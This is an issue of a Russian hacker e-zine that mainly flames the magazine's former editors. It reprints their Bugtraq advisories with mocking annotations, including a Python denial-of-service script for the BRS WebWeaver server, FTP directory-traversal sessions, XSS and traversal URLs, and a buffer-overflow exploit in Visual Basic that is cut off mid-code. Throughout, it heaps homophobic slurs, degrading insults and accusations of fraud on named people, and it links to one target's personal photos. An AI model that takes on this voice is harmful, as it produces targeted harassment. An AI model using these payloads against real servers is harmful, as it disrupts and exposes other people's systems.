::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::: ::::::::: :::::::::: :::::::::: ::: :::::::: :::::::::: ::::::::: :::::::: ::: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#+ +:+ +#++:++# :#::+::# +#++:++#++: +#+ +#++:++# +#+ +:+ +#++:++#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# ### ######### ########## ### ### ### ######## ########## ######### ######## ### ####################################################################################################### ###.f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.### ####################################################################################################### +++ Думаю, сейчас мы вправе сказать - FUCK XbIP, FUCK fUсkR ``sekurity team'', FUCK every1 who think that he is da ruffiest k-otik fuxor on da earth planet!! FUCK lamehatz and gayhatz who claims they are blackhatz, FUCK scene clownz and other beotchez!! euronymous +++ ####################################################################################################### ### I N T R O ### ####################################### Изначально, дефасед задумывался как журнал о российской хак сцене, но получилось совсем другое. Главный редактор euronymous с самого начала стал вс╦ портить, пихая в журнал свои идиотские статьи про тупой дефайсинг. Пуская в проект лохов, он приобрел себе и всему журналу репутацию скрипткидди. После того как уронимоус окончательно стал клоуном ╧1 и превратил журнал в словестный понос и флейм, мы решили выгнать его и всех его дружков-киддисов из defaced staff. Больше не будет бездарных статей на заезжанные темы. В журнале будет только то, для чего он собственно и предназначался - новости сцены. Мы сменили формат, больше никагого html, весь журнал будет помещаться в одном текстовом файле. Enjoy the magazine... Содержание этого номера: (0) Intro by new defaced staff (1) Scene Newz by new defaced staff (2) The top 5 lame advizoryez by new defaced staff (3) Defaced staff demystified by new defaced staff (4) Writing overflowz in VB by euronymous (5) Outro Оффициальное мыло defaced: defaced-zine@mail.ru ####################################################################################################### ### S C E N E N E W Z ### ####################################### Содержание: [0] Defaced_5 - the lamezt zine ever [1] Одним дятлом стало больше [2] defaced fuckazine и копирайты [3] rus-sex.org CHANGELOG [4] Gothic Pictures of euronymous [0] Defaced_5 - the lamezt zine ever Недавно вышел последний номер defaced под редакцией уронимоуса. Пятый дефайсед получился хуже некуда (как всегда). Для начала я расскажу вам о тенденциях журнала. Все дело в том, что уронимоус обчитался журнала ~el8 и захотел стать таким же крутым. Начав войну с m00, он рассчитывал замочить сразу двух зайцев. Создать что-то типа собственного pr0j3ct m4yh3m, а заодно и отомстить Дарку за то, что он когда-то похерил Defaced3. Но даже украденное у ~el8 лого не помогло создать качественный зин. Уровень 'редакции' оказался мягко говоря не очень высоким... Причина провала даже не в низком уровне редакции. О чем вообще может идти речь, когда мемберы d3f4c3d5t4ff сами предлагают сек услуги на сайте с характерным названием - rus-sec.org. Они постят свои бездарные адвизори в багтрек ради наживы. Они рассказывают басни про non-dosclosure, а сами публикуют эксплоиты (причем чужие, своих у них нету) и информацию об уязвимостях в своем зине. Они сами себе противоречат. Подробнее об 'адвизорях' которые постили в багтрек евронимоус и компания читайте в нашем разделе top5 lame advisoryez. Теперь поговорим о наполнении их езина. В первую очередь это раздел 'scenenewz' в котором смакуются события чуть ли не годовой давности(дефейс nerf.ru). Новость про Phrack63 вобще анекдот. Евронимоуса очень сильно расстроили недостатки Sebek которые были в описаны в p63. "Более всего обидно за кейлоггер/сниффер Sebek" - lol )) Он даже не понял о чем идет речь в статье. Sebek это не просто кейлоггер/сниффер, а honeypot ))). "Вероятно, все старое содержимое phrack.nl бесследно исчезло для публики" - еще один lol )) Старое содержимое phrack.nl никуда не исчезло, его можно найти на phrack.unixchicks.com. Не слушайте этот бред, а читайте настоящий phrack: www.el8.nl/p63.tar.gz ;) Статьи Defaced_5 оказались ничем не лучше, чем новости: "writing overflowz in python" - типичная статья на тривиальную тему переполнения стека в unix. Анекдот похлеще предыдущего. К бесплезному коду на python прилагается мягко говоря бредовое введение. Евронимоус все еще не понимает, что выбор языка программирования играет в эксплоитинге второстепенное значение. Он также написал аналгичную статью "Writing overflowz in VB" для defaced6. "icmp-wakeup backdoorz takeover" - в этой статье рассказывается про 'взлом' бакдора из m00-bdpack. Только кому это нужно? В defaced догадывались об этом. Статья начинается со слов "мы тут призадумались, а многие ли юзают этот warez". Хех, бэкдор несложно изменить так, чтобы заставить евронимоуса подбирать правильный флаг целый год. "traderz [ ripperz ] howto" - так Pirog учит кидать людей. "lkm rootkitz trickz" - об этом писали уже сотни раз. "scene not dead" - d3f4c3d5t4ff просто решили порассуждать на тему "кудакатится RU-сцена". Как пишет сам автор, он написал эту статью потому, что поднимать подобные темы стало модным. Он сделал это чтобы не отставать от "двух новых зинов" FDS и Dark Deamon. В конце статьи находится irc-лог того, как один ламер впаривает троян другому. "fast unix trojanin"- такую лабуду можно километрами писать. "the top five lame shellcodez" - обзор лучших шеллкодов которые написал euronymous. "openvms small guide" - эта сатья начинается со слов - "Вот и я решил написать небольшой гайд по openvms. О ней были доки и в x25zine, и в nightfall." - ЛОЛ. Комментарии здесь излишни. "snort ids book" - опять влияние ~el8 на неокрепшие детские умы!(вспомните chapter sixteen). Пытаясь подражать el8, уронимоус д╦рнул главу из книги которую заказал на amazon.com. Он специально умолчал название книги и автора, чтобы никто не понял о какой книге идет речь. Просто глупо подражать ~el8 подобным образом! (btw. Я ничего не имею против el8. Наоборот, я полностью поддерживаю pr0j3ct m4yh3m). "socket coding on asm/x86" - как будто по этой теме мало таториалов написано... "just'a doom" - не спорю, единственное что d3f4c3d5t4ff могут делать по настоящему хорошо, это играть в doom. "the clownz in cow skin" - следствие комплекса неполноценности и ущербности евронимоуса. PS. После выхода Defaced_5, euronymous был с позором выгнан из defaced staff. [1] Одним дятлом стало больше Pirog, основатель проекта ptzhack, кидала и спамер, а ныне мембер d3f4c3d5t4ff, автор статьи "Ripperz howto" для defaced5, получил статус дятла даже в форуме на carderplanet.com Pirog Дятел Дятел ^^^^ [ БАXАХАХАХАХАХА ] Зарегистрирован: 06.05.2003 Сообщения: 86 N 10732 Три лучших поста которые оставил Пирог ака Дятел. (взяты из форума carderplanet без изменений) Сообщение Добавлено: Пт Мар 12, 2004 1:15 am Это что то типа fingerprints Посылают пакет ,получают пакет анализируют . Я знаю что не которые Secuerity team работали над этим! Стоит vmware или нет ! Тоже самое про VPN ... _________________ irc.x25.net.ru #hack.ru Сообщение Добавлено: Вт Фев 10, 2004 2:55 am Кидать кидать кидать всех >......... _________________ irc.x25.net.ru #hack.ru Сообщение Добавлено: Вт Dec 09, 2003 11:58 pm ехх вы ребята !Я могу вам реально сказать что в Питере уже беруться ......Реальный пример уже состоялся ......ну у меня произошло (Нужны им люди Фрекиры,Кардеры );]]]]так что следует за думаться ........ _________________ irc.x25.net.ru #hack.ru [2] defaced fuckazine и копирайты  В defaced_5 euronymous заявил, что журналист журнала "Хакер" Ярослав Дмитриев ака clane, нарушил авторские права defaced. Мол во врезке к одной из статей ксакепа он поместил брутфорсер паролей к серверу shoutcast, который якобы был украден из defaced_3 )) Так вот объясняем ублюдку euro и всем другим ублюдкам )). Аналогичные брутфорсеры из 15ти строк могут пЕсать даже учащиеся старшых групп детского сада. Нет ничего удивительного в том, что журналист ксакепа написал нечто подобное, даже и не подозревая о существовании defaced... Кстати, сам евронимоус не раз нарушал авторские права и пренебрегал чужими копирайтами. Вспомните сколько статей было просто украдено авторами defaced у других людей. Одно лого defaced_3 чего стоит! Естесственно, уронимоус забыл сказать, что оно было взято из ~el8.3. Найдите десять отличий: .~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~. |#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#| |#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#::'####::::::'########:'##::::::::'#######::'##:'#######:'##:::#| |#:'## ##:'##: ##.....:: ##:::::::'##.... ##: #::...... #:: #:::#| |#:..::. ####:: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#| |#::::::....::: ######::: ##:::::::: #######:: #::: ######:: #:::#| |#::::::::::::: ##...:::: ##:::::::'##.... ##: #:::..... #:: #:::#| |#::::::::::::: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#| |#::::::::::::: ########: ########:. #######:: ##: #######: ##:::#| |#:::::::::::::........::........:::.......:::..::.......::..::::#| |#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#| |#:::::::::::::::::FUCKN UP WHITEHATS SINCE 1998:::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#| `~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~' .~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#. |#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#@%!$@^!@#@#%!@#| |#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#::#######::#######:#######:::###:::#######:#######:#######:::###:#######:###::#| |#::##::::##:##::::::##:::::::##:##::##::::::##::::::##::::##::#::::::::##:::#::#| |#::##::::##:##::::::##::::::##:::##:##::::::##::::::##::::##::#::::::::##:::#::#| |#::##::::##:#######:#######:#######:##::::::#######:##::::##::#:::#######:::#::#| |#::##::::##:##::::::##::::::##:::##:##::::::##::::::##::::##::#::::::::##:::#::#| |#::##::::##:##::::::##::::::##:::##:##::::::##::::::##::::##::#::::::::##:::#::#| |#::#######::#######:##::::::##:::##:#######:#######:#######:::###:#######:###::#| |#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#%!@#^$%@!^$%$@#| |#::::::::::::::::::::RUSSIAN UNDERGROUND COMMUNITY 2003::::::::::::::::::::::::#| |#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#@%!$@^!@#@#%!@#| .~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#. [3] rus-sex.org CHANGELOG www.rus-sec.org - оффициальный сайт d3f4c3d5t4ff, на котором они предлагают свои security сервисы, а также услуги веб дизайна. Например, пен-тестинг и "installing additional protection" стоят у них всего $30. Security консультации стоят $30-40. Индивидуальный веб дизайн стоит $80-100. Учитывая то какой дизинг у самого rus-sec.org, веб дизайн заказывают у них только слепые и сумашедшие. [19.03.2004] News: 1) Вышел пятый номер журнала Defaced. Сайт журнала пока что недоступен, поэтому качайте с официальных мирроров. !!!DOWNLOAD!!! 2) Очень скоро, сайт буден координально измен╦н. Скорее всего навсегда исчезнут разделы: shellcodes, services, about. ^^^^^^^^^^^^^^ Было бы неплохо чтобы навсегда исчезли не только пустой раздел shellcodes и раздел services, но весь твой сайт... [4] Gothic Pictures of euronymous Знай своего врага в лицо: http://www.vampirefreaks.com/pics/euronymous/ ####################################################################################################### ### The top 5 lame advizoryez ### ####################################### Нам стало известно, что d3f4c3d5t4ff воглаве с евронимоусом ведут двойную жизнь! Днем они постят свои адвизори в багтрек и делают бабки на защите информации, а ночью они делают журнал defaced в котором поливают грязью всех своих конкурентов... В этой статье мы рассмотрим пять лучших адвизори которые запостила в багтреш ex-редакция defaced: 0. XSS and Path Disclosure in UPB 1. BRS WebWeaver fool disclosure (уронимоус постил это целых 25 раз! mega lol) 2. BRS WebWeaver advisory ╧25 3. XSS in od fag 4. childish buffer overflow =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS and Path Disclosure in UPB product: Ultimate PHP Board (UPB) final beta 1.0 vendor: http://www.webrc.ca/php/upb.php risk: middle date: 12/7/2k2 discovered by: euronymous /F0KP /HACKRU Team ^^^^^^^ [ Мембер HACKRU CREW? Ты крут чувак! ] advisory url: http://f0kp.iplus.ru/bz/009.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- [ Те у кого стоит спам-фильтр на слово XSS были лишены удовольствия читать это дерьмо. Мы тоже его пропустим... ] ps. all of this issues applied to previus versions upb. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, ^^^^^^^^^ [ А это случайно не те кого ты обсераешь? ] all russian security guyz!! and kate for she is kewl girl )) ^^^^^^^^^^^^^^^^^^^^^^^ [ Евро поприветствовал всех кто делает деньги на security-фуфле... ] fuck_off: slavomira and other dirty ppl in *.kz ================ im not a lame, ^^^^ [ Выучи сначала английский... ] not yet a hacker ^^^^^ [ Не может быть! Ты же мембер HACKRU.. ] ================ =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: BRS WebWeaver: full disclosure ^^^^^^^^^^^^ [ Ты поддерживаешь full-disclosure? Еще бы! Благодаря fool-disclosure security индустрия процветает... ] product: BRS WebWeaver 1.03 vendor: http://www.brswebweaver.com risk: high date: 31/03/2k3 tested platform: Windows 98 Second Edition ^^^^^^^^^^ [ Любимая платформа евронимоуса. ] discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/019.en.txt http://f0kp.iplus.ru/bz/019.ru.txt contact email: euronymous@iplus.ru =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= Issues ------ 1. Dos Device Path vulnerability in FTP Server 2. Long URL DoS in HTTP Server 3. Weak Encryption Sheme 4. Remote System Information Gathering 5. Path Disclosure in FTP Server 6. Directory Traversal in FTP Server 1. Dos Device Path vulnerability in FTP Server ---------------------------------------------- i have found, that FTP server doesnt checks path, typed by user. malicious local user can crash FTP (and HTTP also) server on non-patched Windows98 machine. just type this command in WebWeaver ftp session: cd /aux/aux/ After this server goes down.. Solutions: 1) Apply corresponding patch for your windows 2) Wait for new version of WebWeaver 3) Remove this crap at all )) ^^^^^^^^^ [ Ты имел ввиду свою адвизори? ] .... CRAP REMOVED AT ALL .... 4. Remote System Information Gathering -------------------------------------- Any remote user can get many useful information about system, where BRS WebWeaver is installed. If within installation procedure test cgi scripts was installed [in default], then it will enough to go to this url: http://hostname/scripts/testcgi.exe [ Ты считаешь это серьезной уязвимостью? ] }--------------- start of testcgi.exe output ---------------{ CGI Test Program Arguments To Testcgi Argument 1 : Environment Variables [ Далее идет килобайт CGI переменных которые вывел testcgi.exe Не знаю зачем euronymous поместил это в свое адвизори. Наверное для того, чтобы увеличить размер. Он думает чем больше текста, тем круче адвизори... ] }--------------- end of testcgi.exe output ---------------{ Solution: Remove this script from /scripts/ directory. [ Без тебя об этом никто бы не догадался... ] 5. Path Disclosure in FTP Server -------------------------------- I wrote about this vulnerability in v1.01 of WebWeaver already: http://f0kp.iplus.ru/bz/012.en.txt It was published in Bugtraq mailing list, but in v1.03 [ euronymous пишет в багтрек про BRS WebWever уже в пятый или шестой раз... ] this flaw else doesnt was fixed. [ Ммм. Плохо учил английский в школе... ] }-------------- sample session -----------{ 220 BRS WebWeaver FTP Server ready. User (********.***.*****.***:(none)): 123 331 Password required for 123. Password: 230 User 123 logged in. ftp> pwd 257 "/" is current directory. ftp> mkdir test 257 '/test': directory created. ftp> mkdir test 550 'c:\ftp\test': can't create directory. ftp> rmdir test 250 '/test': directory removed. ftp> rmdir test 550 'c:\ftp\test': no such directory. ftp> }-------------- sample session -----------{ ^^^^^^^^^^^^^^^^^^^ [ Евро показал всем как он умеет пользоваться ftp ] So, if user make attempt to create already existent directory or remove unexistent directory, then Ftp server will output full system path. Solutions: 1) Wait for new version of WebWeaver 2) Remove this crap at all )) 6. Directory Traversal in FTP Server ------------------------------------ I wrote about this vulnerability in v1.01 of WebWeaver already: http://f0kp.iplus.ru/bz/012.en.txt It was published in Bugtraq mailing list, but in v1.03 [ Тебе не надоело писать одно и тоже по десять раз? ] this flaw else doesnt was fixed. ^^^^^^^^^^^^^^^^ [ Необьяснимая игра английских слов )) ] }-------------- sample session -----------{ 220 BRS WebWeaver FTP Server ready. User (********.***.*****.***:(none)): 123 331 Password required for 123. Password: 230 User 123 logged in. ftp> pwd 257 "/" is current directory. ftp> mkdir ../test 257 '/..\test': directory created. ftp> rmdir ../test 250 '/..\test': directory removed. ftp> mkdir ../windows/test 257 '/..\windows\test': directory created. ftp> rmdir ../windows/test 250 '/..\windows\test': directory removed. ftp> }-------------- sample session -----------{ ^^^^^^^^^^^^^^ [ Евро еще раз показал всем как он умеет пользоваться ftp клиентом... ] How you can see any user can exploit this traversal bug for creating and removing directories outside ftp_root. But user cannot use more useful commands like `ls', `dir'. [ Еще одна очень серьезная уязвимость.. Ты можешь только создавать и удалять пустые каталоги )) ] Solutions: 1) Wait for new version of WebWeaver 2) Remove this crap at all )) shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, ^^^^^^^^^^^^^ [ Это сайт того чела который продает эксплоиты iDefense!! ] all russian security guyz!! to kate especially )) ^^^^^^^^^ [ Хмм. russian security guy по имени kate... Может это твой бойфренд-трансвестит? ] f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb f*cking team ================ im not a lame, ^^^^^^^^ [ В этом я сильно сомневаюсь... ] not yet a hacker ^^^^^^^^ [ А об этом уже и так все знают! ] ================ Еще раз повторюсь и напомню вам, что евронимоус постил свое BRS WebWeaver advisory в багтрек несчитанное количество раз(каждый раз с небольшими изменениями). Почему он это делал? Скорей всего потому что не мог произвести ничего нового. Не имея в перспективе никакого нового материала он пытался выжать из BRS WebWeaver максимум пользы. =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: BRS WebWeaver: POST and HEAD Overflaws product: BRS WebWeaver v1.04 and prior [ i guess ] vendor: www.brswebweaver.com risk: high date: 05/25/2k3 tested platform: Windows 98 Second Edition discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/025.en.txt http://f0kp.iplus.ru/bz/025.ru.txt ^^^^^ [ уронимоус постит это уже двадцать пятый раз. MEGA LOL! ] contact email: euronymous@iplus.ru =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- more b0fs in Webweaver. sending 32700 charz in POST or HEAD request will crash http server. when send 32699 charz with fadvWWhtdos.py, webweaver print 403 error. when sending >= 32700 charz, server will print `Unable to insert string' error and you have to restart it. }------- start of fadvWWhtdos.py ---------------{ #! /usr/bin/env python ### # WebWeaver 1.04 Http Server DoS exploit # by euronymous /f0kp [http://f0kp.iplus.ru] ######## # Usage: ./fadvWWhtdos.py ######## import sys import httplib met = raw_input(""" What kind request you want make to crash webweaver?? [ HEAD/POST ]: """) target = raw_input("Type your target hostname [ w/o http:// ]: ") spl = "f0kp"*0x1FEF conn = httplib.HTTPConnection(target) conn.request(met, "/"+spl) r1 = conn.getresponse() print r1.status }--------- end of fadvWWhtdos.py ---------------{ ^^^^^^^^^^^^^^^ [ Подробнее о том как писать такие эксплоиты читайте в статье "writing overflowz in python" ] shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, N0b0d13s Team and all russian security guyz!! ^^^^^^^^^^^^^^^^^^^^^^^^ [ Снова поприветствовал всех security-геев... ] to kate especially )) hates: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb lamers team == yeah, i really __HATE__ yours!! ================ im not a lame, not yet a hacker ================ Теперь адвизори которые постил ex ╧2 defaced staff nimber. Кстати, nimber - вечный второй. Сначала номер 2 в ZUD после вульфа, теперь номер 2 в defaced staff после уронимоуса(или всетаки номер 6?). Он очень ответственный и исполнительный работник. В то время как Wolf руководил бизнес процессом в ZUD TEAM, нимбер послушно разрабатывал дизайн сайта... ################################# # ZUD SECURITY TEAM PRESENT # ################################ # bug found by nimber # # Email : nimber@designer.ru # # Site: www.zudteam.org # # HomePage: www.nimber.plux.ru # # 9.08.2003 # ################################ Script: ODFaq Versions: 1.21b Web Site: www.oodie.com Bug: Multiple bugs. 1) Cross Site Scripting. JS/HTML code injection. Exploit(exaple): www.server.com/odfaq2/adminfaq.php3?action=edit_section&cat= 2) Directory traversal. Exploit(exaple): www.server.com/odfaq2/adminfaq.php3?action=edit_section&cat=../../ ^^^^^^^ [ Очень оригинально.... ] 3)Reading of any file. Exploit(exaple): www.server.com/odfaq2/adminfaq.php3action=edit_section&cat=../files.htm ^^^^^^^ [ Лол. Это тоже самое что и в пункте 3... ] 4) At attempt to open a nonexistent file, there is a mistake. Exploit(exaple): Warning: stat failed for /home/home/htusfrdm/www/odfaq2/data/ (errno=2 - No such file or directory) in /home/home/htusfrdm/www/odfaq2/adminfaq.php3 on line 74 ################################# #GreetZ:ЗАРАЗА,DWC,RushTeam, # ^^^^^^ [ Это же тот чувак который торгует эксплоитами!!! А еще говорите что не ризнаете авторитетов в security эксператх... ] #Gipshack,Void,DHG and # #all Russian Security Team. # ^^^^^^^^^ [ Поприветствовал всех себе подобных... ] ################################# ______________________________________________________________ /###############################################################\ # ZUD SECURITY TEAM PRESENT # #: ################################################################: # bug found by nimber # #: # # (0_0(0_o)0_o) #: # Email : nimber@mail.ru # #: # # www.zudteam.org #: # # #: ################################################################: ======================\\ : Advisory Information: //----------------------------------------o =====================// : Name : NetSurf : Versions : 3.02 (and all?) : Platform : Windows : Web Site : www.klodware.narod.ru : ^^^^^^^^^^^ [ Хахаха )) нимбер очень любит искать баги в фриварных прогах, которые пишут его 12ти летние сверстники ))) ] Severity : High : ----------------------------------------------------------------o ======================\\---------------------------------------/ Overview: // Buffer Overflow in NetSurf 3.02 / =====================//______________________________________/ o Bug: Buffer Overflow. | Exploit(exaple): | Crash browser by sending long http request. | http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA| ^^^^^^^^^ [ Тоже очень оригинально.... ] ____________________________________________________________o ____________________________________________________________| Gr33tZ: void.ru,RusH Team,m00 security,eXploit.ru,LWTeam, | ^^^^^^^^^^ [ А теперь он поприветствовал своих кумиров... Этих клоунов в коровей шкуре.... ] F0K Project,Free-Crew, 3APA3A | ^^^^^ [ Еще один кумир... ] ___________________________________________________________// Я бы мог поместить сюда еще пару десятков аналогичных адвизори, но они не интересны и однообразны до ужаса. Если вы хотите увидеть все достижения уронимоуса и др., то наберите в гугл строку "euronymous security" (или "gay anal sex"), а также посетите сайт www.rus-sec.org ####################################################################################################### ### Defaced staff demystified ### ####################################### В этой небольшой статье мы решили рассказать вам о людях, которых мы выгнали из defaced staff. Сцена должна знать своих героев! 0. euronymous - бывший главный редактор defaced. Специалист по поиску XSS в гостевых книгах. Любит пофилософствовать на тему команд unix, а также большой любитель питона и жопы. Написал статьи "Жопа и безопасность" и "writing overflowz in python". Интересный факт из жизни euronymous: однажды мама случайно уронила маленького евро с балкона. Он очень больно стукнулся головой, а мозги его вытекли на асфальт. С тех пор все зовут его уронимоус... 1. nimber - специалист по тупому дефайсингу и защите информации. Любит искать уязвимости в фриварных прогах под windows и постить их в багтрек. Бывший ╧2 в ZUD Security team. 2. Pirog - специалист по киданию людей в irc и рассылке спама. Заслуженный дятел кардерпланеты. Автор статьи "Traderz-ripperz HOWTO". С удовольствием поменяет "fresh private m00 0day warez" на последнюю версию XSpider. Будьте бдительны! 3. eX0Rc157(в прошлом JLx[ZUD]) - Спец по впариванию троянов или шеллкодов, которые скачивают трояны с его сайта на narod.ru. Мастерски переводит туториалы с linuxassembly.org на русский язык(для defaced). После распада zud secteam поступил на тестовый срок в m00, но был выгнан из-за фатальной неспособности делать хоть что-то серьезное. 4. + многие другие приходящие\уходящие от номера к номеру личности, которых мы не берем в расчет. ####################################################################################################### ### Writing overflowz in VB ### ####################################### NOTE FROM THE EDITOR: euronymous написал эту статью для очередного выпуска defaced. WRiTiNG 0VERFL0WZ iN ViZUAL bAZiC =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Зачем было писать эту статью?? Целей несколько: во-первых, в сети нет информации о написании эксплоитов в Visual Basic, и я просто решил восполнить этот пробел. Общедоступен всего один хороший пример - это iglooftp эксплоит от Peter Winter-Smith, но он довольно сложен для понимания новичками. Это же касается продуктов XSpider и UST-CGISCANER. Во-вторых, я хотел показать, что писать эксплоиты переполнения буфера не так сложно, как вы можете представить, и для успешной реализации атаки уязвимой программы не обязательно изучать Си и вешать на себя табличку ``секурити ехперт'' и с умным видом создавать группу таких же имбицилов, которые после нескольких неудачных попыток смогли-таки установить mandrake linux и дочитать до конца статью ``buffer overflow for kidz'', чем горды до беспамятства. Почему Visual Basic?? Просто он мне нравится, а потому все реплики типа ``настАящиИ ИксплоЕты надА пЕсать в С'' предлагаю запихать себе в жопу. А если duffy d4rk спросит меня ``а почему не qbasic?'', то я ему отвечу: ПОТОМУ ЧТО В QBASIC НЕТУ СОКЕТОВ ИМБИЦИЛ Я ТЕБЯ НЕНАВИЖУ СВОЛОЧЬ ЧТОБ ТЫ СДОХ!!! Ну а если правда есть желание пофлеймить на эту тему, то напишите письмо в Positive Tehnologies и спросите, почему они, ламеры тупоговоловые, написали XSpider на Visual Basic, а не на другом языке. Здесь я не буду объяснять что такое переполнения буфера, как они работают и как выглядят - я сам ничего этого не понимаю. В англоязычном интернете есть по крайней мере две статьи, чтения которых достаточно для полного теоретического отупления. ' BRS WebWeaver 3xpl0it f0r defaced6 3z1n33 ' ViZUAL bAZiC 0VERFL0WZ pAp3r ' ' PR1VAT3!! PR1VAT3!! PR1VAT3!! PR1VAT3!! ' PR1VAT3!! PR1VAT3!! PR1VAT3!! PR1VAT3!! ' UNPUBL1SH3D 5H1T!! D0 N0T D1STR1BUT3 U FUCKR ' ' ADV1Z0RY URLZ: ' http://f0kp.iplus.ru/advisorys/webweaver01.txt ' http://f0kp.iplus.ru/advisorys/webweaver02.txt ' http://f0kp.iplus.ru/advisorys/webweaver03.txt ' http://f0kp.iplus.ru/advisorys/webweaver04.txt ' http://f0kp.iplus.ru/advisorys/webweaver05.txt ' http://f0kp.iplus.ru/advisorys/webweaver06.txt ' http://f0kp.iplus.ru/advisorys/webweaver07.txt ' http://f0kp.iplus.ru/advisorys/webweaver08.txt ' http://f0kp.iplus.ru/advisorys/webweaver09.txt ' http://f0kp.iplus.ru/advisorys/webweaver10.txt ' http://f0kp.iplus.ru/advisorys/webweaver11.txt ' http://f0kp.iplus.ru/advisorys/webweaver12.txt ' http://f0kp.iplus.ru/advisorys/webweaver13.txt ' http://f0kp.iplus.ru/advisorys/webweaver14.txt ' http://f0kp.iplus.ru/advisorys/webweaver15.txt ' http://f0kp.iplus.ru/advisorys/webweaver16.txt ' http://f0kp.iplus.ru/advisorys/webweaver17.txt ' http://f0kp.iplus.ru/advisorys/webweaver18.txt ' http://f0kp.iplus.ru/advisorys/webweaver19.txt ' http://f0kp.iplus.ru/advisorys/webweaver20.txt ' http://f0kp.iplus.ru/advisorys/webweaver21.txt ' http://f0kp.iplus.ru/advisorys/webweaver22.txt ' http://f0kp.iplus.ru/advisorys/webweaver23.txt ' http://f0kp.iplus.ru/advisorys/webweaver24.txt ' http://f0kp.iplus.ru/advisorys/webweaver25.txt ' ' N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3 ' N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3 ' ' T3ZT3D 0N Windows 98 s3ck0nd 3d1ti0n ' Private Sub Command3_Click() On Error GoTo errhlp For x = 1 To 1020 pad = pad & Chr(&H41) Next x 'l33t sh3llc0d3 c0d3d by JLx[ZUD] 'firzt publ1sh3d in defaced_3 shellcode = Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & _ Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & _ Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & _ Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) ebp = "FUCK" eip = Chr(Val("&H" & Text5.Text)) & Chr(Val("&H" & Text4.Text)) & Chr(Val("&H" & _ 